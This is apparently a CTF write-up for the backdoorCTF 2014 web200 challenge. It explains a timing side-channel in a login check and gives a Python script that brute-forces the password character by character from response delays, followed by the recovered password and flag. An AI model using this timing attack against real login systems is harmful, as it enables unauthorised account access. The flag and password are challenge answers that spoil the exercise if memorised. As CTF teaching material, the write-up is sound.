backdoorCTF 2014 WriteUp - web200
This task is to retrieve the password to a login page.
In the source code we find a usleep(20000) which is executed when the checked letter of the input is correct.
To bruteforce the password we write a script which throws an exception if a given timeout is exceeded.
#!/usr/bin/env python
import urllib2
import string
alpha=string.letters+string.digits
url="http://backdoor.cognizance.org.in/problems/web200/submit.php?key="
time_offset=0.4
password=""
for i in range(5):
t=time_offset+(i*0.2)
for a in alpha:
test_key=password+a*(5-len(password))
try:
r=urllib2.urlopen(url+test_key, timeout=t)
except:
if len(password)<=i:
password+=a
print password
break
r=urllib2.urlopen(url+password)
print r.read()
This way we can compute the complete password letter by letter.
./brute.py
Z
Z9
Z9A
Z9A9
Z9A9x
With the password Z9A9x we get the flag:
ee7528e19f87ba00b4b4c721b646a8a2